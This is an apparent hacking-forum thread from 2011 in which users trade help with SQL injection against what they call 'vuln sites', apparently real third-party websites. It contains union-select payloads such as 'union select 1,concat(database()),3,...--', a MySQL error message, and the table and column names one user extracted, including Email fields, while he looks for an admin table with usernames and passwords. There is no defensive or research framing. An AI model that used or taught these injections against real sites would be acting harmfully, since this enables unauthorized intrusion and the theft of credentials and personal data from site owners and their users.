Quote:(06-30-2011, 07:34 PM)xxl00pb4ckxx Wrote: [To see links please register here]
Hey I'm getting the hang of it, but no luck yet...
When I get to replacing @@version with concat(database()) to pull the db name I get this error on every site:
Here's an example:
[To see links please register here]
--
works fine, outputs: 5.1.56
ok so I replace @@version and now the url looks like:
[To see links please register here]
union select 1,concat(database()),3,4,5,6,7,8,9,10,11,12--
the url look mangled in the input box: [To see links please register here]
now
and I get this error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database ,3,4,5,6,7,8,9,10,11,12- AND PostType = 2 LIMIT 13' at line 1
help? getting the same thing on like 5 vuln sites in a row :sad:
this is my style bro....
[To see links please register here]
union select 1,concat(database()),3,4,5,6,7,8,9,10,11,12--
[To see links please register here]
--
FOUnd:FORUM,FORUM_COMMENTS,OBITUARIES,POST
[To see links please register here]
--
Found:ID,Title,Date,Post,VISIBLE,ID,Forum_ID,Name,Email,Location,Comment,Date,Visible,ID,Title,obituary,Image,IsVisible,ID,Title,Tagline,Author,DatePosted,Post,Image,Caption,ImageAuthor,PostType,FrontPage,IsPublish
it can't find admin table... so i just want to show you example to find user+pass from admin table..
this:
[To see links please register here]
--
but it still not found another data ,because the table/column in database is none...
i'm so sorry before my english is sucks ...
^_^' :epic: